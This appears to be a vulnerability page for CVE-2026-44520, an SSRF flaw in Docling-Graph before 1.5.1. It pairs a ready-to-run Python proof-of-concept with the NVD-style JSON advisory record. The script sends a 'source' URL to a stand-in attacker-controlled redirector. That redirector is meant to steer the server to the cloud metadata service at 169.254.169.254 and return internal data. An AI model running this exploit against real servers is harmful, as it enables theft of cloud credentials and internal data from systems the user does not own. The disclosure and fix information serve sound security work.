CVE-2026-44520

import requests # Proof of Concept for CVE-2026-44520 # This script demonstrates how an attacker can trigger the SSRF vulnerability # by exploiting the 'source' parameter without IP validation. def trigger_ssrf(target_api, malicious_url): """ Simulates sending a request to the vulnerable Docling-Graph endpoint. :param target_api: The URL of the vulnerable Docling-Graph API instance. :param malicious_url: The URL that redirects to an internal resource. """ headers = { "Content-Type": "application/json" } # Payload exploiting the --source or PipelineConfig.source parameter payload = { "source": malicious_url } try: print(f"[*] Sending payload to {target_api} with source: {malicious_url}") response = requests.post(target_api, json=payload, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print("[+] Response Content:") print(response.text) # Check if response suggests successful connection to internal resource if response.status_code == 200: print("[!] Potential SSRF successful. Check response content for internal data.") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage: # Replace with the actual target endpoint vulnerable_target = "http://localhost:8000/api/v1/process" # A URL that redirects to an internal address (e.g., AWS metadata service) # Attacker controls redirector.com and sets it to redirect to http://169.254.169.254/latest/meta-data/ ssrf_payload = "http://attacker-controlled-redirect.com/redirect-to-metadata" trigger_ssrf(vulnerable_target, ssrf_payload)

{"cve": {"id": "CVE-2026-44520", "sourceIdentifier": "[email protected]", "published": "2026-05-14T18:16:50.010", "lastModified": "2026-05-14T18:27:25.110", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Docling-Graph turns documents into validated Pydantic objects, then builds a directed knowledge graph with explicit semantic relationships. Prior to 1.5.1, the URLInputHandler class in docling_graph/core/input/handlers.py makes HTTP requests to user-supplied URLs without validating whether the target resolves to a private, loopback, or link-local IP address. The URLValidator only checks for a valid scheme and non-empty netloc, performing no IP-level validation. Additionally, requests.head() was called with allow_redirects=True, allowing an attacker to redirect requests to internal endpoints via an intermediary URL. An attacker who can control the --source CLI argument or PipelineConfig.source API parameter can trigger Server-Side Request Forgery (SSRF). This vulnerability is fixed in 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/docling-project/docling-graph/security/advisories/GHSA-fqph-j6v6-jvgx", "source": "[email protected]"}]}}